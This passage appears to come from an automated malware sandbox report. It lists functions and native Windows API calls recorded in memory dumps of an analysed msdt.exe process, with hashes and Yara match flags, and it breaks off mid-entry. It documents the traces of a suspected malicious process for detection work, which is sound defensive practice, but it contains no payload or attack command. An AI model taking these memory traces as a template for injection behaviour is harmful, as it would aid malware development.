                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009F9A10, Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a87b286a87d3b6518633f211995eda2f07b3c5a12a76921a818c1e2ba3ad22fa
                                                                                    • Instruction ID: 775ad670dbdae808bf9249eeb307aaaeb7ba03b8917f0e4267cb0d6004fe51e5
                                                                                    • Opcode Fuzzy Hash: a87b286a87d3b6518633f211995eda2f07b3c5a12a76921a818c1e2ba3ad22fa
                                                                                    • Instruction Fuzzy Hash: A890027220140802E20061A95818747000597D0342F51C021A5154559E86E5C891B571
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009F9610, Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0237e89f9fb358252aa03fdbcfe5328325d51c987e8a2fd1ce09b881c93a8692
                                                                                    • Instruction ID: 23190718bb53d499ba0a4770775a5efa5b8f2109ce770ffda56622c6498dd494
                                                                                    • Opcode Fuzzy Hash: 0237e89f9fb358252aa03fdbcfe5328325d51c987e8a2fd1ce09b881c93a8692
                                                                                    • Instruction Fuzzy Hash: 5D90027260500C02E25071A95424746000597D0341F51C021A0014658D87D58A55B6E1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009F9650, Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0e1af8b8f7348fd39d2729bc649f056df18b71df24c55a299a1e5a03cc273c49
                                                                                    • Instruction ID: 039ce595278285400bbb92fb09e3ca865cda6be3efcb80dec237220665e291bd
                                                                                    • Opcode Fuzzy Hash: 0e1af8b8f7348fd39d2729bc649f056df18b71df24c55a299a1e5a03cc273c49
                                                                                    • Instruction Fuzzy Hash: 0A90027220504C42E24071A95414A46001597D0345F51C021A0054698D96A58D55F6A1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009FA3B0, Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7be02a7b2e4986244ea11cf8b319b89c77b98fc67f49f471d7320d388ac1b48c
                                                                                    • Instruction ID: d3744963c416ea363f239d5a1b3d513eabc34086cdcbf6e987a1fadd67afd54f
                                                                                    • Opcode Fuzzy Hash: 7be02a7b2e4986244ea11cf8b319b89c77b98fc67f49f471d7320d388ac1b48c
                                                                                    • Instruction Fuzzy Hash: D790027220144402E24071A9945460B5005A7E0341F51C421E0415558C86958856E261
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009F9B00, Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 995da8195854d9f72e7e4774c264a33f3ff9ecdeb06639a3cf65c9aff3c23a35
                                                                                    • Instruction ID: 60665fb960228afb63421be36d89ca9fde4f915eadda5a408e0c4d53d1c984f5
                                                                                    • Opcode Fuzzy Hash: 995da8195854d9f72e7e4774c264a33f3ff9ecdeb06639a3cf65c9aff3c23a35
                                                                                    • Instruction Fuzzy Hash: 1190026224100C02E24071A994247070006D7D0741F51C021A0014558D86968965B6F1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009F9670, Relevance: .0, Instructions: 2COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                    • Instruction ID: e1560ae298a7156ab064f87fff04349582ecc425a528a40acb59b94e2f6b0a66
                                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                    • Instruction Fuzzy Hash:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A4FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 53%
                                                                                    			E00A4FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E009FCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				L00A45720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return L00A45720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                    0x00a4fdda
                                                                                    0x00a4fde2
                                                                                    0x00a4fde5
                                                                                    0x00a4fdec
                                                                                    0x00a4fdfa
                                                                                    0x00a4fdff
                                                                                    0x00a4fe0a
                                                                                    0x00a4fe0f
                                                                                    0x00a4fe17
                                                                                    0x00a4fe1e
                                                                                    0x00a4fe19
                                                                                    0x00a4fe19
                                                                                    0x00a4fe19
                                                                                    0x00a4fe20
                                                                                    0x00a4fe21
                                                                                    0x00a4fe22
                                                                                    0x00a4fe25
                                                                                    0x00a4fe40

                                                                                    APIs
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A4FDFA
                                                                                    Strings
                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A4FE01
                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A4FE2B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                    • API String ID: 885266447-3903918235
                                                                                    • Opcode ID: 047f2975765252d463194e3f9cdeb6d97c3b0215f0d9471ecc640299cacd0846
                                                                                    • Instruction ID: aa175ee76ad20d93205dadc1b6fbb9a5af9205be2f7b8caa8c20ed51bef38ee4
                                                                                    • Opcode Fuzzy Hash: 047f2975765252d463194e3f9cdeb6d97c3b0215f0d9471ecc640299cacd0846
                                                                                    • Instruction Fuzzy Hash: A1F0F676640601BFDA201B55DD03F23BB6AEBC5730F244324F628565E2DA62FC2097F0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Analysis Process: msdt.exe PID: 4940 Parent PID: 3472 msdt.exeCOMMON

                                                                                    Executed Functions

                                                                                    Function 00739D4C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41filenativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wKs,007A002E,00000000,00000060,00000000,00000000), ref: 00739D9D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID: .z`$wKs
                                                                                    • API String ID: 823142352-2500474017
                                                                                    • Opcode ID: 03abae50bb545071d66d496927b8db6d1589226d9a9b056b4dc6db0eb81e1cf5
                                                                                    • Instruction ID: 785edf6b195ce42bccc68ef4579936136e4b69f63d0c5fa1032a029a079edf8c
                                                                                    • Opcode Fuzzy Hash: 03abae50bb545071d66d496927b8db6d1589226d9a9b056b4dc6db0eb81e1cf5
                                                                                    • Instruction Fuzzy Hash: C901F2B2200208AFCB08CF98CC95EEB37E9AF8C304F158248FA5C97241D630E801CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00739D50, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40filenativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wKs,007A002E,00000000,00000060,00000000,00000000), ref: 00739D9D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID: .z`$wKs
                                                                                    • API String ID: 823142352-2500474017
                                                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                    • Instruction ID: 8c393f8601f4b698fac6339597c70579d4cd8e5545f673b8c154f994470e4355
                                                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                    • Instruction Fuzzy Hash: 26F0B2B2200208AFCB08CF88DC95EEB77ADAF8C754F158248BA1D97241C630F8118BA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00739F2B, Relevance: 1.6, APIs: 1, Instructions: 50memorynativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00722D11,00002000,00003000,00000004), ref: 00739F69
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateMemoryVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2167126740-0
                                                                                    • Opcode ID: c7a1a75913f356c3679643153bcfacefb076b0347c46a6c6a4db526fdbf23396
                                                                                    • Instruction ID: 3ad47938963f93b86183dc2824af09976a86b26e90520e3e6bff9562f0cde5fb
                                                                                    • Opcode Fuzzy Hash: c7a1a75913f356c3679643153bcfacefb076b0347c46a6c6a4db526fdbf23396
                                                                                    • Instruction Fuzzy Hash: 9A011AB1200209AFDB14DF88DC85EAB73ADAF88314F118549FE5897241C634E811CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00739DFD, Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtReadFile.NTDLL(?,?,FFFFFFFF,007349F1,?,?,?,?,007349F1,FFFFFFFF,?,2Ms,?,00000000), ref: 00739E45
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: ee1793ca8a730358b49f8f6e7efeddaa7c0a62ec052aa2b5602196a42512307d
                                                                                    • Instruction ID: acd9c790e8600cf58a228f207764a458b5b5dfaa81054e67986e3d3f72f3d5ed
                                                                                    • Opcode Fuzzy Hash: ee1793ca8a730358b49f8f6e7efeddaa7c0a62ec052aa2b5602196a42512307d
                                                                                    • Instruction Fuzzy Hash: DCF0F4B2200108AFCB14DF88DC81EEB77A9AF8C714F128248FA5DA7241C630E8118BA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00739E00, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtReadFile.NTDLL(?,?,FFFFFFFF,007349F1,?,?,?,?,007349F1,FFFFFFFF,?,2Ms,?,00000000), ref: 00739E45
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                    • Instruction ID: b71e524ec3ae3f91e9ca628a9daf5c0ed3506c0ea16f42c1fa9ab7d509337b3c
                                                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                    • Instruction Fuzzy Hash: 40F0A9B2200108AFDB14DF89DC95EEB77ADAF8C754F158248BA5D97241D630E8118BA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00739F30, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00722D11,00002000,00003000,00000004), ref: 00739F69
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateMemoryVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2167126740-0
                                                                                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                    • Instruction ID: b8f8523b1a834bad24ad2ccb3906f72c4edd3e5865d7df291a75da5a747fe578
                                                                                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                    • Instruction Fuzzy Hash: 95F015B2200208AFDB14DF89CC81EAB77ADAF88750F118148BE58A7241C630F810CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00739E7A, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtClose.NTDLL(00734D10,?,?,00734D10,00000000,FFFFFFFF), ref: 00739EA5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    • Opcode ID: 6ede00cb1086168951f11c79a166cf3a5bd6b7055d8ad82b15e65f430210ea8d
                                                                                    • Instruction ID: fbba8baf49b5804d38ead558d3a563f635eef7c1f904cc608b8db3fa4c256ebb
                                                                                    • Opcode Fuzzy Hash: 6ede00cb1086168951f11c79a166cf3a5bd6b7055d8ad82b15e65f430210ea8d
                                                                                    • Instruction Fuzzy Hash: 7BE08675100110AFD714DFA8DC85EA77B69EF44360F114159B95CDB291C130A5008690
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00739E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtClose.NTDLL(00734D10,?,?,00734D10,00000000,FFFFFFFF), ref: 00739EA5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                    • Instruction ID: fdda1465fc7c2e2f0cf74f5f0bf16d6068c53abc55904180341e75b003729463
                                                                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                    • Instruction Fuzzy Hash: 2AD01275200214BBD710EB98CC46F97775CEF44750F154455BA5C5B242C530F50086E0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04BD9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.499640468.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                                                    • Associated: 0000000E.00000002.500141172.0000000004C8B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 0000000E.00000002.500150489.0000000004C8F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 3ad41815f0f43508aa78d5c72f0946b80b882b22ee10bb6965e7bc3251c6f7bc
                                                                                    • Instruction ID: 7c5095e3853bd71901c3eb0b8741dc8f9decaea92770b6dc3a9e086939cc886e
                                                                                    • Opcode Fuzzy Hash: 3ad41815f0f43508aa78d5c72f0946b80b882b22ee10bb6965e7bc3251c6f7bc
                                                                                    • Instruction Fuzzy Hash: 6790027220100513F111615B4504727000DD7D02C5F91C456A4415568D97D6D962B161
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04BD9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.499640468.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                                                    • Associated: 0000000E.00000002.500141172.0000000004C8B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 0000000E.00000002.500150489.0000000004C8F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: ec8eaddfe02b466c42bd306feebc413025e0e4746081152010dfb02744152079
                                                                                    • Instruction ID: b64b58ce2e1d2d6b8d00423ffcf2a8272a0e72d545d53527109ebedf3b095196
                                                                                    • Opcode Fuzzy Hash: ec8eaddfe02b466c42bd306feebc413025e0e4746081152010dfb02744152079
                                                                                    • Instruction Fuzzy Hash: 8F900262242042527545B15B4404527400AE7E02C5791C056A5405960C86A6E866E661
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04BD99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.499640468.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                                                    • Associated: 0000000E.00000002.500141172.0000000004C8B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 0000000E.00000002.500150489.0000000004C8F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 45577d17f4c503d851b9650b729e2e427a76c07ac7d4a094c583cd1918c18d5d
                                                                                    • Instruction ID: 1c61a90667de30aae65d1568d0661085ecaca202d4328cf878fa248f322948ec
                                                                                    • Opcode Fuzzy Hash: 45577d17f4c503d851b9650b729e2e427a76c07ac7d4a094c583cd1918c18d5d
                                                                                    • Instruction Fuzzy Hash: CC9002A234100542F100615B4414B260009D7E1385F51C059E5055564D8799DC627166
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04BD95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.499640468.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                                                    • Associated: 0000000E.00000002.500141172.0000000004C8B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 0000000E.00000002.500150489.0000000004C8F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 490aca31ce8d3b0bda408cd9ee2aed77981c5ddd12a2035b74a5b1b310450618
                                                                                    • Instruction ID: a9f5de11883dfd4de7a6c5234e6bd8e32c96dd34678150dac1cf430d9cd58794
                                                                                    • Opcode Fuzzy Hash: 490aca31ce8d3b0bda408cd9ee2aed77981c5ddd12a2035b74a5b1b310450618
                                                                                    • Instruction Fuzzy Hash: 3D9002A2202001036105715B4414636400ED7E0285B51C065E50055A0DC6A5D8A17165
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04BD9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.499640468.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                                                    • Associated: 0000000E.00000002.500141172.0000000004C8B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 0000000E.00000002.500150489.0000000004C8F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 51662246bb87337cf0d7c0e358ae5bfd84b92af0a351a0fb048742311aa9cd33
                                                                                    • Instruction ID: 307cf968eaff5753f194733837797794aafa2bed07c7edb161acb2f54c567b15
                                                                                    • Opcode Fuzzy Hash: 51662246bb87337cf0d7c0e358ae5bfd84b92af0a351a0fb048742311aa9cd33
                                                                                    • Instruction Fuzzy Hash: 789002B220100502F140715B44047660009D7D0385F51C055A9055564E87D9DDE576A5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04BD9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.499640468.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                                                    • Associated: 0000000E.00000002.500141172.0000000004C8B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 0000000E.00000002.500150489.0000000004C8F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 5c3923b0a28e7d748687fcaa729683b4afec54af9efc64ac7ca8609586a432ab
                                                                                    • Instruction ID: 674813185d02b6000b2cf10c351803f16bebcefa5243cf95fc9d042b32bb0b9b
                                                                                    • Opcode Fuzzy Hash: 5c3923b0a28e7d748687fcaa729683b4afec54af9efc64ac7ca8609586a432ab
                                                                                    • Instruction Fuzzy Hash: 1D900266211001032105A55B0704527004AD7D53D5351C065F5006560CD7A1D8716161
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04BD96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.499640468.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                                                    • Associated: 0000000E.00000002.500141172.0000000004C8B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 0000000E.00000002.500150489.0000000004C8F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: a61ac9451054653e99b122f89af85b51c3442f0385fe9750764848f58961d321
                                                                                    • Instruction ID: a83ec1ba0a2e31722a32aad6a449cde440e70e8a720052217d40556eb190cbe1
                                                                                    • Opcode Fuzzy Hash: a61ac9451054653e99b122f89af85b51c3442f0385fe9750764848f58961d321
                                                                                    • Instruction Fuzzy Hash: D590027220108902F110615B840476A0009D7D0385F55C455A8415668D87D5D8A17161
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04BD96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.499640468.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                                                    • Associated: 0000000E.00000002.500141172.0000000004C8B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 0000000E.00000002.500150489.0000000004C8F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: f44a8cfee5a1ab7c4c692b79784f5d4c4d1f929b31f2d66cb633535681fa5696
                                                                                    • Instruction ID: 7085317934fb8c2841ca5bf38beab0b00d60664fe17985df837082a408b4a833
                                                                                    • Opcode Fuzzy Hash: f44a8cfee5a1ab7c4c692b79784f5d4c4d1f929b31f2d66cb633535681fa5696
                                                                                    • Instruction Fuzzy Hash: A290027220100942F100615B4404B660009D7E0385F51C05AA4115664D8795D8617561
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04BD9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.499640468.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                                                    • Associated: 0000000E.00000002.500141172.0000000004C8B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 0000000E.00000002.500150489.0000000004C8F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: c24f2eacae1c7fc812ef34e72f13298da2840ec14c0729af13df412609440900
                                                                                    • Instruction ID: b976dacdf855afc1d0793cd3393c0763d7d28157a5940a3fa0e89199982508ba
                                                                                    • Opcode Fuzzy Hash: c24f2eacae1c7fc812ef34e72f13298da2840ec14c0729af13df412609440900
                                                                                    • Instruction Fuzzy Hash: FC90027220100902F180715B440466A0009D7D1385F91C059A4016664DCB95DA6977E1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04BD9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.499640468.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                                                    • Associated: 0000000E.00000002.500141172.0000000004C8B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 0000000E.00000002.500150489.0000000004C8F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 80f0aa24a42afcd15c15b2aef9f3a01621ef3675fafb6d7d7c40635fb6742075
                                                                                    • Instruction ID: 71f33b11e48c9a10424fabfbab11876d6fa046036a8c5ac682d9f1ae35bd3bc9
                                                                                    • Opcode Fuzzy Hash: 80f0aa24a42afcd15c15b2aef9f3a01621ef3675fafb6d7d7c40635fb6742075
                                                                                    • Instruction Fuzzy Hash: B290027220504942F140715B4404A660019D7D0389F51C055A40556A4D97A5DD65B6A1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04BD9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
